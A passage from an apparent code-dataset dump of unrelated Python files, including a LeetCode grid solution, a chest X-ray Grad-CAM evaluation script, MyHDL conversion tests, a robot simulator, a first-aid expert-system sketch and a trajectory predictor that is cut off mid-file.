[[0,1,2,3,4],[24,23,22,21,5],[12,13,14,15,16],[11,17,18,19,20],[10,9,8,7,6]]\nOutput: 16\nExplanation:\n 0 1 2 3 4\n24 23 22 21 5\n12 13 14 15 16\n11 17 18 19 20\n10 9 8 7 6\n\nThe final route is marked in bold.\nWe need to wait until time 16 so that (0, 0) and (4, 4) are connected.\nNote:\n\n2 <= N <= 50.\ngrid[i][j] is a permutation of [0, ..., N*N - 1].\n\"\"\"\nimport heapq\nimport collections\nclass Solution:\n def swimInWater(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n N = len(grid)\n heap = [(grid[0][0], 0, 0)]\n visited = {grid[0][0]}\n while heap:\n t, i, j = heapq.heappop(heap)\n if i == N-1 and j == N-1: return t\n for ii, jj in {(i-1, j), (i+1, j), (i, j-1), (i, j+1)}:\n if 0 <= ii < N and 0 <= jj < N and grid[ii][jj] not in visited:\n visited.add(grid[ii][jj])\n heapq.heappush(heap, (max(t, grid[ii][jj]), ii, jj))\n return -1\n\n # binary search + bfs\n def swimInWater2(self, grid):\n N = len(grid)\n def reachable(t):\n queue = collections.deque()\n queue.append((0, 0))\n visited = {(0, 0)}\n while queue:\n r, c = queue.popleft()\n if grid[r][c] > t: continue\n if r == c == N-1: return True\n for dr, dc in [[-1, 0], [1, 0], [0, 1], [0, -1]]:\n r0, c0 = r + dr, c + dc\n if 0 <= r0 < N and 0 <= c0 < N and (r0, c0) not in visited:\n queue.append((r0, c0))\n visited.add((r0, c0))\n return False\n\n l, r = 0, N*N-1\n while l < r:\n m = (l+r) // 2\n if reachable(m): r = m\n else: l = m + 1\n return r\n\ns = Solution()\nassert s.swimInWater([[0,2],[1,3]]) == 3\nassert s.swimInWater([[0,1,2,3,4],[24,23,22,21,5],[12,13,14,15,16],[11,17,18,19,20],[10,9,8,7,6]]) == 16\n","sub_path":"leetcode/swimInRisingWater/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"59016702","text":"import csv\nimport cv2\nimport sys\nimport os\nimport torch\nimport pickle\nimport numpy as np\nimport skimage.transform\nimport torch.nn as nn\nimport torchvision\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport torch.optim as optim\nfrom torch.autograd import Function\nfrom torchvision import models\nfrom torchvision import utils\nimport skimage\nfrom skimage.io import *\nfrom skimage.transform import *\nimport scipy\nimport scipy.ndimage as ndimage\nfrom gradcam import *\nfrom imageio import imread\nimport torchvision.transforms as transforms\nfrom torch.utils.data import Dataset, DataLoader\n\nuse_gpu = torch.cuda.is_available() \nnum_classes = 8\nclass_index = ['Atelectasis', 'Cardiomegaly', 'Effusion', 'Infiltrate', 'Mass', 'Nodule', 'Pneumonia', 'Pneumothorax']\nbbox_name =[]\nbbox_info = []\nimage_dic = {}\nwith open(\"./split/3-label/dataset/BBox_List_2017.csv\") as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n i = 0 \n for row in readCSV:\n if i != 0:\n if row[0] not in image_dic.keys(): \n image_dic[row[0]] = {} \n image_dic[row[0]][row[1]] = None \n #image_dic[row[0]][row[1]] = [] \n image_dic[row[0]][row[1]] = row \n bbox_name.append(row[0])\n bbox_info.append(row)\n i = i + 1\ntest_txt_path = \"./split/3-label/dataset/test_list.txt\" \nimage_folder_path = \"./split/3-label/dataset/images\" \nwith open(test_txt_path, \"r\") as f:\n test_list = [i.strip() for i in f.readlines()]\ntest_data = []\nos.mkdir(\"original\")\nos.mkdir(\"masks\")\nos.mkdir(\"heatmaps\")\nos.mkdir(\"boundresults\")\n\nfor i in range(len(test_list)):\n image_path = os.path.join(image_folder_path, test_list[i])\n image = imread(image_path)\n if image.shape != (1024,1024):\n image = image[:,:,0]\n image_resized = skimage.transform.resize(image,(256,256), mode='reflect')\n test_data.append((np.array(image_resized)).reshape(256,256,1))\ntest_data = np.array(test_data)\n#print(\"length of test data\",len(test_list))\n\n# from https://www.pyimagesearch.com/2016/11/07/intersection-over-union-iou-for-object-detection/\ndef bb_intersection_over_union(boxA, boxB):\n\t# determine the (x, y)-coordinates of the intersection rectangle\n\txA = max(boxA[0], boxB[0])\n\tyA = max(boxA[1], boxB[1])\n\txB = min(boxA[2], boxB[2])\n\tyB = min(boxA[3], boxB[3])\n \n\t# compute the area of intersection rectangle\n\tinterArea = max(0, xB - xA + 1) * max(0, yB - yA + 1)\n \n\t# compute the area of both the prediction and ground-truth\n\t# rectangles\n\tboxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)\n\tboxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)\n \n\t# compute the intersection over union by taking the intersection\n\t# area and dividing it by the sum of prediction + ground-truth\n\t# areas - the interesection area\n\tiou = interArea / float(boxAArea + boxBArea - interArea)\n \n\t# return the intersection over union value\n\treturn iou \n\n\n\nclass CXRData(Dataset):\n def __init__(self, input = test_data, transform=None):\n self.x = np.uint8(test_data*255)\n self.transform = transform\n def __getitem__(self, index):\n current_x = np.tile(self.x[index],3)\n image = self.transform(current_x)\n return image\n def __len__(self):\n return len(self.x)\n\nclass densenet121(nn.Module):\n def __init__(self, out_size):\n super(densenet121, self).__init__()\n self.densenet121 = torchvision.models.densenet121(pretrained=True)\n #print(\"self.densenet121\", self.densenet121)\n num_features = self.densenet121.classifier.in_features\n self.densenet121.classifier = nn.Sequential(nn.Linear(num_features, out_size))#,nn.Sigmoid())\n def forward(self, x):\n x = self.densenet121(x)\n return x\n\nmodel = densenet121(num_classes)\nif use_gpu == True:\n model = model.cuda()\n\nmodel = torch.nn.DataParallel(model)\n#model.load_state_dict(torch.load(\"model/dense121_BCE9_0.6729095625692398.pkl\", map_location={'cuda:0': 'cpu'}))\nmodel.load_state_dict(torch.load(\"best/dense121_WBCE24_0.6797693935647515.pkl\", map_location={'cuda:0': 'cpu'}))\n#model.load_state_dict(torch.load(\"model/dense121_maskFalse_BCE_lr0.0002_wd0.0_drop_rate0.3_0.7092140641429037.pkl\", map_location={'cuda:0': 'cpu'}))\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\ntest_dataset = CXRData(input = test_data,transform=transforms.Compose([\n transforms.ToPILImage(),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean,std)\n ]))\n\nprint(\"======= creating heatmap starts=======\")\nmodel.eval()\n\nheatmap_output = []\nimage_id = []\noutput_class = []\n\n\nif use_gpu == True:\n gcam = GradCAM(model=model, cuda=True)\nelse:\n gcam = GradCAM(model=model, cuda=False)\nall_iou_value = []\nfor index in range(len(test_dataset)):\n fname = test_list[index]\n func = nn.Sigmoid()\n test_output = func(model(test_dataset[index].unsqueeze(0)).detach())\n activate_classes = (test_output>0.5)[0]\n #optimal_thresholds = [0.024621395, 0.005373399, 0.012895545, 0.017944088, 0.09455918, 0.03133899, 0.0011880096, 0.022412254]\n #activate_classes = (test_output.numpy() >np.asarray(optimal_thresholds))[0]\n activate_classes = np.where(activate_classes ==True)[0]\n #activate_classes = range(0, len(class_index)) \n if fname in bbox_name and len(activate_classes)!=0:\n print(\"fname\", fname)\n print(\"activate_classes\",activate_classes)\n if use_gpu == True:\n input_image = Variable((test_dataset[index]).unsqueeze(0).cuda(), requires_grad=True)\n else:\n input_image = Variable((test_dataset[index]).unsqueeze(0), requires_grad=True)\n probs = gcam.forward(input_image)\n #activate_classes = np.where((probs > thresholds)[0]==True)[0] # get the activated class\n for activate_class in activate_classes:\n gcam.backward(idx=activate_class)\n #output = gcam.generate(target_layer=\"module.densenet121.features.denseblock4.denselayer16.conv.2\")\n output = gcam.generate(target_layer=\"module.densenet121.features.denseblock4.denselayer16.conv2\")\n if np.sum(np.isnan(output)) > 0:\n print(\"fxxx nan\")\n heatmap_output.append(output)\n image_id.append(index)\n output_class.append(activate_class)\n\n k = int(activate_class)\n original = input_image.detach().numpy()\n original = np.transpose(original, (0,2,3,1))[0]\n original = original * std + mean\n original = np.uint8(original * 255.0)\n gcam.save(\"./heatmaps/\"+ fname[:-4] +\"_\"+class_index[activate_class]+\".png\", output, original)\n print(\"heatmap output done\")\n\n mask = np.uint8(output * 255.0)\n cv2.imwrite(\"./masks/\"+fname[:-4] +\"_\"+class_index[activate_class]+\".png\", mask)\n mask_image = cv2.imread(\"./masks/\"+fname[:-4] +\"_\"+class_index[activate_class]+\".png\")\n #original_image = original\n cv2.imwrite(\"./original/\"+fname[:-4]+\"_\"+class_index[k]+\".png\",original ) \n original_image = cv2.imread(\"./original/\"+fname[:-4]+\"_\"+class_index[k]+\".png\") \n #print(\"original_image\", original_image[1,:])\n #ret, threshed_image = cv2.threshold(cv2.cvtColor(mask_image, cv2.COLOR_BGR2GRAY), 125, 255, cv2.THRESH_BINARY)\n ret, threshed_image = cv2.threshold(cv2.cvtColor(mask_image, cv2.COLOR_BGR2GRAY), 180, 255, cv2.THRESH_BINARY)\n kernel = np.ones((1,1), np.uint8)\n closing = cv2.morphologyEx(threshed_image, cv2.MORPH_CLOSE, kernel, iterations=20)\n #======\n #CV_CHAIN_APPROX_SIMPLE compresses horizontal, vertical, and diagonal segments and \n #leaves only their end points. For example, an up-right rectangular contour is encoded with 4 points\n #CV_RETR_EXTERNAL retrieves only the extreme outer contours. \n #It sets hierarchy[i][2]=hierarchy[i][3]=-1 for all the contours.\n #======\n _, contours, _ = cv2.findContours(closing, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n count = 0\n heatmap = cv2.imread(\"./heatmaps/\"+fname[:-4]+\"_\"+class_index[k]+\".png\") \n # Predictions (RED)\n temp_iou = -1 \n for cnt in contours:\n area = cv2.contourArea(cnt)\n #if (area > 30**2):\n if (area > 20**2):\n # bounding box\n x2, y2, w2, h2 = cv2.boundingRect(cnt)\n cv2.rectangle(original_image, (x2,y2), (x2+w2, y2+h2), (0,0,255), 2)\n if class_index[k] in image_dic[fname]: \n row_i = image_dic[fname][class_index[k]]\n fname = row_i[0]\n x , y, w,h = int(float(row_i[2])/4-16),int(float(row_i[3])/4-16),int(float(row_i[4])/4), int(float(row_i[5])/4)\n #cv2.rectangle(heatmap, (x,y), (x+w, y+h), (0,0,0), 2)\n # truth\n #cv2.rectangle(original_image, (x,y), (x+w, y+h), (255,0,0), 2)\n cv2.rectangle(original_image, (x,y), (x+w, y+h), (0,255,255), 2)\n boxA = [float(x) , float(y), float(x) + float(w),float(y) + float(h)]\n boxB = [float(x2), float(y2),float(x2)+ float(w2), float(y2) + float(h2)]\n new_iou = bb_intersection_over_union(boxA, boxB) \n if temp_iou < new_iou:\n temp_iou = new_iou\n cv2.imwrite(\"./boundresults/\"+fname[:-4]+\"_\"+class_index[k]+\".png\",original_image) \n if temp_iou !=-1:\n print(\"fname\", fname)\n print(\"class_index[k]\", class_index[k])\n print(\"temp_iou\", temp_iou)\n all_iou_value.append(temp_iou)\n #cv2.imwrite(\"./boundresults/\"+fname[:-4]+\"_\"+class_index[k]+\".png\",original_image) \nprint(all_iou_value)\nprint(\"len(all_iou_value)\",len(all_iou_value))\ngreater_than_thresh = []\nfor elem in all_iou_value:\n if(elem > 0.5):\n greater_than_thresh.append(1.0) \n else:\n greater_than_thresh.append(0.0) \n#print(\"greater_than_thresh 0.5\",greater_than_thresh)\nlength = len(greater_than_thresh)\nprint(\"Accuracy for threshold = 0.5\", sum(greater_than_thresh) / length)\ngreater_than_thresh2 = []\nfor elem in all_iou_value:\n if(elem > 0.25):\n greater_than_thresh2.append(1.0) \n else:\n greater_than_thresh2.append(0) \n#print(\"greater_than_thresh 0.25\",greater_than_thresh2)\nlength = len(greater_than_thresh2)\nprint(\"Accuracy for threshold = 0.25\", sum(greater_than_thresh2) / length)\n","sub_path":"code/main/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":10561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"646741852","text":"import os\nimport stat\n\nexecutable = stat.S_IEXEC | stat.S_IXGRP | stat.S_IXOTH\nfor filename in os.listdir('.'):\n if os.path.isfile(filename):\n st = os.stat(filename)\n mode = st.st_mode\n if mode & executable:\n print(filename,oct(mode))\n","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"558302419","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:Liang Lian\n\nimport socket\nip_port = ('127.0.0.1',9999)\nsk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)\nsk.bind(ip_port)\n\nwhile True:\n data = sk.recv(1024)\n print(str(data, encoding='utf-8'))","sub_path":"day9/socket_UDP/socket_udp_server.py","file_name":"socket_udp_server.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"588349657","text":"from __future__ import absolute_import\nimport os\npath = os.path\n\nimport random\nfrom random import randrange\nrandom.seed(2)\n\nfrom myhdl import *\n\nfrom myhdl import ConversionError\nfrom myhdl.conversion._misc import _error\n\n\nACTIVE_LOW, INACTIVE_HIGH = 0, 1\n\ndef incRef(count, enable, clock, reset, n):\n \"\"\" Incrementer with enable.\n \n count -- output\n enable -- control input, increment when 1\n clock -- clock input\n reset -- asynchronous reset input\n n -- counter max value\n \"\"\"\n @instance\n def logic():\n while 1:\n yield clock.posedge, reset.negedge\n if reset == ACTIVE_LOW:\n count.next = 0\n else:\n if enable:\n count.next = (count + 1) % n\n return logic\n\n\ndef incGen(count, enable, clock, reset, n):\n \"\"\" Generator with __vhdl__ is not permitted \"\"\"\n @instance\n def logic():\n __vhdl__ = \"Template string\"\n while 1:\n yield clock.posedge, reset.negedge\n if reset == ACTIVE_LOW:\n count.next = 0\n else:\n if enable:\n count.next = (count + 1) % n\n return logic\n\n \ndef inc(count, enable, clock, reset, n):\n \"\"\" Incrementer with enable.\n \n count -- output\n enable -- control input, increment when 1\n clock -- clock input\n reset -- asynchronous reset input\n n -- counter max value\n \"\"\"\n @always(clock.posedge, reset.negedge)\n def incProcess():\n # make it fail in conversion\n import types\n if reset == ACTIVE_LOW:\n count.next = 0\n else:\n if enable:\n count.next = (count + 1) % n\n\n count.driven = \"reg\"\n\n __vhdl__ = \\\n\"\"\"\nprocess (%(clock)s, %(reset)s) begin\n if (reset = '0') then\n %(count)s <= (others => '0');\n elsif rising_edge(%(clock)s) then\n if (enable = '1') then\n %(count)s <= (%(count)s + 1) mod %(n)s;\n end if;\n end if;\nend process;\n\"\"\"\n \n return incProcess\n\n\ndef incErr(count, enable, clock, reset, n):\n \n @always(clock.posedge, reset.negedge)\n def incProcess():\n # make it fail in conversion\n import types\n if reset == ACTIVE_LOW:\n count.next = 0\n else:\n if enable:\n count.next = (count + 1) % n\n\n count.driven = \"reg\"\n\n __vhdl__ = \\\n\"\"\"\nalways @(posedge %(clock)s, negedge %(reset)s) begin\n if (reset == 0) begin\n %(count)s <= 0;\n end\n else begin\n if (enable) begin\n %(count)s <= (%(countq)s + 1) %% %(n)s;\n end\n end\nend\n\"\"\"\n \n return incProcess\n\n\n\ndef inc_comb(nextCount, count, n):\n\n @always_comb\n def logic():\n # make if fail in conversion\n import types\n nextCount.next = (count + 1) % n\n\n nextCount.driven = \"wire\"\n\n __vhdl__ =\\\n\"\"\"\n%(nextCount)s <= (%(count)s + 1) mod %(n)s;\n\"\"\"\n\n return logic\n\ndef inc_seq(count, nextCount, enable, clock, reset):\n\n @always(clock.posedge, reset.negedge)\n def logic():\n if reset == ACTIVE_LOW:\n count.next = 0\n else:\n if (enable):\n count.next = nextCount\n\n count.driven = True\n\n __vhdl__ = \\\n\"\"\"\nprocess (%(clock)s, %(reset)s) begin\n if (reset = '0') then\n %(count)s <= (others => '0');\n elsif rising_edge(%(clock)s) then\n if (enable = '1') then\n %(count)s <= %(nextCount)s;\n end if;\n end if;\nend process;\n\"\"\"\n \n return logic\n\ndef inc2(count, enable, clock, reset, n):\n \n nextCount = Signal(intbv(0, min=0, max=n))\n\n comb = inc_comb(nextCount, count, n)\n seq = inc_seq(count, nextCount, enable, clock, reset)\n\n return comb, seq\n\n\ndef inc3(count, enable, clock, reset, n):\n inc2_inst = inc2(count, enable, clock, reset, n)\n return inc2_inst\n\n\ndef clockGen(clock):\n @instance\n def logic():\n clock.next = 1\n while 1:\n yield delay(10)\n clock.next = not clock\n return logic\n\nNRTESTS = 1000\n\nENABLES = tuple([min(1, randrange(5)) for i in range(NRTESTS)])\n\ndef stimulus(enable, clock, reset):\n @instance\n def logic():\n reset.next = INACTIVE_HIGH\n yield clock.negedge\n reset.next = ACTIVE_LOW\n yield clock.negedge\n reset.next = INACTIVE_HIGH\n for i in range(NRTESTS):\n enable.next = 1\n yield clock.negedge\n for i in range(NRTESTS):\n enable.next = ENABLES[i]\n yield clock.negedge\n raise StopSimulation\n return logic\n\n\ndef check(count, enable, clock, reset, n):\n @instance\n def logic():\n expect = 0\n yield reset.posedge\n # assert count == expect\n print(count)\n while 1:\n yield clock.posedge\n if enable:\n expect = (expect + 1) % n\n yield delay(1)\n # print \"%d count %s expect %s count_v %s\" % (now(), count, expect, count_v)\n # assert count == expect\n print(count)\n return logic\n\n\ndef customBench(inc):\n\n m = 8\n n = 2 ** m\n\n count = Signal(intbv(0)[m:])\n enable = Signal(bool(0))\n clock, reset = [Signal(bool(1)) for i in range(2)]\n\n inc_inst = inc(count, enable, clock, reset, n=n)\n clk_1 = clockGen(clock)\n st_1 = stimulus(enable, clock, reset)\n ch_1 = check(count, enable, clock, reset, n=n)\n\n return inc_inst, clk_1, st_1, ch_1\n\n\n\ndef testIncRef():\n assert conversion.verify(customBench, incRef) == 0\n\ndef testInc():\n assert conversion.verify(customBench, inc) == 0\n \ndef testInc2():\n assert conversion.verify(customBench, inc2) == 0\n \ndef testInc3():\n assert conversion.verify(customBench, inc3) == 0\n\ndef testIncGen():\n try:\n assert conversion.verify(customBench, incGen) == 0\n except ConversionError as e:\n pass\n else:\n assert False\n \ndef testIncErr():\n try:\n assert conversion.verify(customBench, incErr) == 0\n except ConversionError as e:\n pass\n else:\n assert False\n\n\n\n\n \n\n \n \n\n\n \n\n \n\n","sub_path":"test/conversion/toVHDL/test_custom.py","file_name":"test_custom.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345889404","text":"n,m=map(int,input().split())\ns=n|m\ny=bin(s)\n#print(s)\nc=0\nfor i in range(0,len(y)):\n if y[i]==\"1\":\n c=c+1 \nprint(c)\n \n","sub_path":"p160.py","file_name":"p160.py","file_ext":"py","file_size_in_byte":136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"549432055","text":"from . import common\nfrom . import errors\n\n\n# =====\nclass DowntimesApi(common.BaseApi):\n def get(self, host, service=None, handle=\"api/downtime/check.sbml\"):\n attrs = {\n \"object\": host,\n \"append_comment\": \"1\",\n \"downtime_type\": \"current_future\",\n }\n if service is not None:\n attrs[\"eventtype\"] = service\n\n result = self._get(handle, attrs)\n if result.status_code == 200 and result.text.startswith(\"ok\"):\n values = result.text.split(\" \", 3)[1:]\n if len(values) == 0:\n return None # No downtime\n elif len(values) == 3:\n return {\n \"start\": int(values[0]),\n \"end\": int(values[1]),\n \"description\": values[2].strip(),\n }\n else:\n raise RuntimeError(\"Invalid response from Golem: {}\".format(values))\n else:\n raise errors.GolemApiError(result)\n\n def set(self, host, user, timeout, description, service=None, handle=\"api/downtime/set.sbml\"):\n attrs = {\n \"hostname\": host,\n \"user\": user,\n \"downtime_for\": timeout,\n \"comment\": description,\n }\n if service is not None:\n attrs[\"service\"] = service\n attrs[\"cmd\"] = \"service_downtime\"\n else:\n attrs[\"cmd\"] = \"host_downtime\"\n\n result = self._post(handle, attrs)\n if result.status_code == 200 and result.text.startswith(\"ok\"):\n return\n else:\n raise errors.GolemApiError(result)\n\n def delete(self, host, user, description, service=None, handle=\"api/downtime/set.sbml\"):\n self.set(host, user, 1, description, service, handle)\n","sub_path":"golemapi/downtimes.py","file_name":"downtimes.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"475709957","text":"\n##################################################################################################################\n\"\"\"\nThis script contains the Volume class for all calculations relating to Volume\n\"\"\"\n\n# Libs\nimport numpy as np\n\n__version__ = '1.1.1'\n__author__ = 'Victor Guillet'\n__date__ = '29/11/2018'\n\n##################################################################################################################\n\n\nclass VOLUME:\n def __init__(self, big_data, amplification_factor=1):\n \"\"\"\n Calculate and generates amp_coef list based on volume to be used as an amplification signal\n\n :param big_data: BIGDATA class instance\n :param amplification_factor: Amplification factor of the signal\n \"\"\"\n from PhyTrade.Tools.MATH_tools import MATH_tools\n\n self.volume = np.array(big_data.data_slice.sliced_data[\"Volume\"])\n\n # Normalising volume signal values between 0 and 1\n self.amp_coef = MATH_tools().normalise_zero_one(self.volume)\n\n # Amplifying volume signal\n self.amp_coef = MATH_tools().amplify(self.amp_coef, amplification_factor)\n","sub_path":"PhyTrade/Economic_model/Technical_Analysis/Amplification_signals/Volume_gen.py","file_name":"Volume_gen.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"589353835","text":"from elements.map import Map\nfrom elements.obstacle import Obstacle\nfrom elements.robot import Robot\nfrom game.engine import Engine\nfrom game.engine_event import EngineEvent\nimport threading\n\n# App information\nVERSION = \"1.0\"\nROBOSIM_TITLE = \"RoboSim v.{} by Lukasz Zmudzinski | zmudzinski.me\".format(VERSION)\n\nclass RoboSim:\n def __init__(self, map, multipath=True, debug=False):\n # Information values\n self.start = False \n self.default_size = 30 # Keeps the default drawing size\n\n # Robosim values\n self.map = map \n self.robots = []\n self.obstacles = self.__create_obstacles() \n self.robot_start = None\n self.robot_goal = None\n\n # Debug values\n self.path = [] \n self.debug = debug\n self.multipath = multipath\n\n def __create_obstacles(self):\n \"\"\"Creates obstacle objects from map data\"\"\"\n result = []\n for row in range(0, self.map.dimensions[0]):\n for column in range(0, self.map.dimensions[1]):\n if self.map.generated_map[row][column] == 1:\n result.append(Obstacle(\n position=(self.default_size * row, self.default_size * column),\n size = (self.default_size, self.default_size)\n ))\n return result\n\n def __check_for_user_input(self):\n \"\"\"Checks for user input and returns False, when closing the app.\"\"\"\n for event in Engine.get_events():\n engine_event, value = Engine.get_robosim_event(event)\n if engine_event == EngineEvent.START:\n self.start = True\n if engine_event == EngineEvent.PAUSE:\n self.start = False\n if engine_event == EngineEvent.QUIT:\n return False\n\n if self.debug:\n if engine_event == EngineEvent.LEFT_CLICK:\n self.path.append(value)\n if engine_event == EngineEvent.RIGHT_CLICK:\n if len(self.path) > 0:\n # Create a new robot! Beep-Boop!\n robot = Robot(value)\n robot.path = self.path[:]\n if self.multipath:\n self.path = []\n self.robots.append(robot)\n else:\n if engine_event == EngineEvent.LEFT_CLICK: \n if self.robot_start is None:\n self.robot_start = value\n elif self.robot_goal is None:\n self.robot_goal = value\n\n return True\n\n def add_obstacle(self, obstacle):\n \"\"\"Adds an obstacle.\"\"\"\n self.obstacles.append(obstacle)\n\n def update_robots(self):\n for robot in self.robots:\n robot.update_position()\n\n def __go(self, title, size_mult):\n \"\"\"Runs the simulation.\"\"\" \n window_size = [self.map.dimensions[0] * self.default_size, self.map.dimensions[1] * self.default_size]\n screen, clock = Engine.start(window_size, title) \n pygame_running = True\n\n # Let's run this thing!\n while pygame_running:\n # Check for user input.\n pygame_running = self.__check_for_user_input()\n\n # Update robot positions\n if self.start:\n self.update_robots()\n\n # Draw stuff on the map\n Engine.draw(\n screen, self.obstacles, self.robots, \n self.path, self.robot_start, self.robot_goal\n )\n # Set framerate and update the screen.\n Engine.update_display(clock, 60)\n Engine.stop()\n\n\n def run(self, title=ROBOSIM_TITLE, size_mult=20):\n \"\"\"Starts the simulation in a thread.\"\"\"\n t = threading.Thread(target=self.__go, args=(title, size_mult))\n t.start()\n","sub_path":"robosim.py","file_name":"robosim.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"347388941","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 20 10:15:17 2019\n\n@author: johna\n\"\"\"\nfrom easygui import *\nfrom pyDatalog import pyDatalog\n\n\ndef infos_secours():\n msg = \"Informations a transmettre au secours\"\n title = \"Application de secourisme\"\n fields = (\"Nom\",\"Lieu de la victime\",\"Nombre de victimes\",\"Etat de la ou des victimes\",\"Les obstacles potentiels pour le transport des victimes\")\n mes_choix = multenterbox(msg, title, fields)\n return mes_choix\n\ndef infos_victime():\n msg = \"Informations a transmettre au secours\"\n title = \"Application de secourisme\"\n fields = (\"Description et localisation des symptomes\",\"Quantifier la douleur (1 a 10)\",\"Qualifier la douleur(brulure,lourdeur,etc..)\")\n mes_choix = multenterbox(msg, title, fields)\n symptomes = mes_choix\n\n msg = \"Demandez à la victime si elle est allergique à certains médicaments ou aliments.\"\n title = \"Application de secourisme\"\n fields = (\"\")\n mes_choix = textbox(msg, title, fields)\n allergie = mes_choix\n\n msg = \"Est-ce que la victime prend des medicaments\"\n title = \"Application de secourisme\"\n choices = (\"Oui\",\"Non\")\n type_choice = choicebox(msg, title, choices)\n\n if(type_choice == \"Oui\"):\n msg = \"Lesquels ?\"\n title = \"Application de secourisme\"\n fields = (\"\")\n mes_choix = textbox(msg, title, fields)\n medicaments = mes_choix\n \n msg = \"Informations a transmettre au secours\"\n title = \"Application de secourisme\"\n fields = (\"Probleme de sante/Historique medical\",\"Rentre-t-elle d’un voyage ? Depuis moins de 3 semaines ?\")\n mes_choix = multenterbox(msg, title, fields)\n passe_medical = mes_choix\n \n msg = \"Demandez à la victime quelle était l’heure de son dernier repas, la quantité ingérée ainsi que ce qu’elle a mangé.\"\n title = \"Application de secourisme\"\n fields = (\"\")\n mes_choix = textbox(msg, title, fields)\n repas = mes_choix\n \n msg = \"Demandez à la victime ce qui s’est passé au moment de l'accident et ce qu'elle faisait à ce moment précis.\"\n title = \"Application de secourisme\"\n fields = (\"\")\n mes_choix = textbox(msg, title, fields)\n evenement = mes_choix\n \n\npyDatalog.clear()\npyDatalog.create_terms(\"X,Y,Identification\")\npyDatalog.create_terms(\"Electrique\",\"Physique\")\npyDatalog.create_terms(\"Chaleur\",\"Asphyxie\")\npyDatalog.create_terms(\"suppression_danger\",\"balisage_zone\",\"evacuation_urgence\")\n\nIdentification(X) <= Electrique(X)\nIdentification(X) <= Physique(X)\n\nElectrique(X) <= Asphyxie(X)\nPhysique(X) <= Chaleur(X)\n\n+Chaleur(suppression_danger)\n+Chaleur(balisage_zone)\n+Chaleur(evacuation_urgence)\n\n\n+Asphyxie(suppression_danger)\n+Asphyxie(balisage_zone)\n+Asphyxie(evacuation_urgence)\n\nprint(Identification(X))\n\n","sub_path":"Documents/Ynov/Cours/Artificial Intelligence/partiel/systeme_expert_christopher_pulvaldady.py","file_name":"systeme_expert_christopher_pulvaldady.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"296413849","text":"import numpy as np\nfrom functools import partial\nimport pandas as pd\nimport time\nimport os\nimport utils as ut\nimport model as mo\nimport adapters as ad\n\n\nclass Predictor(object):\n\n def __init__(self, save_name, n_obs, n_preds, batch_df2input_fcn, predict,\n raw_pred2pred, validate_batch=None):\n self.save_name = save_name\n self.n_obs = n_obs\n self.n_preds = n_preds\n self.batch_df2input_fcn = batch_df2input_fcn\n self.predict = predict\n self.raw_pred2pred = raw_pred2pred\n self.validate_batch = validate_batch\n\n\ndef get_sgan_predictor(method_name, test_dataset, dataset_split, make_pred_fcn=None):\n \"\"\"\n \n :param method_name: \n :param test_dataset: \n :param dataset_split: \n :param make_pred_fcn: (n_samples, model_path) -> pred_fcn\n - pred_fcn: (abs_xy, rel_xy, seq_start_end) -> sampled prediction list\n - prediction list[i] = n_preds, n_peds, 2 | list of sampled predictions\n :return: \n \"\"\"\n model_path = os.path.join(ut.MODELS_ROOT, '{}/{}/{}.pt'.format(method_name, dataset_split, test_dataset))\n print(model_path)\n n_samples = 100\n n_obs = 8\n n_preds = 8\n batch_df2input_fcn = partial(ad.batch_df2batch, n_obs=n_obs)\n predict_fcn = make_pred_fcn(n_samples, model_path)\n raw_pred2pred = partial(ad.raw_pred2df, tform=np.eye(3))\n save_name = 'SGAN_{}_{}'.format(n_samples, test_dataset)\n predictor = Predictor(save_name, n_obs, n_preds,\n batch_df2input_fcn, predict_fcn, raw_pred2pred)\n return predictor\n\n\ndef main():\n methods = [\n (mo.ModelType(is_large=True, is_sd_s=True, is_sd_p=True).get_name(), get_sgan_predictor),\n ]\n dataset_names = [\n # 'eth',\n # 'hotel',\n # 'zara',\n 'univ',\n ]\n dataset_split = 'split_1.0_0'\n # dataset_split = 'split_0.2_2'\n is_evaluate_cross = False\n is_skip_if_exists = False\n is_display = False\n is_test_on_all = True\n\n dataset2gt_name = {\n 'eth': 'batches_eth_test',\n 'hotel': 'batches_hotel_test',\n 'zara': 'batches_zara_test',\n 'univ': 'batches_univ_test',\n }\n for method_name, get_predictor in methods:\n for train_dataset in dataset_names:\n for test_dataset in dataset_names:\n if train_dataset != test_dataset and not is_evaluate_cross:\n continue\n try:\n predictor = get_predictor(\n method_name, test_dataset, dataset_split)\n except FileNotFoundError as 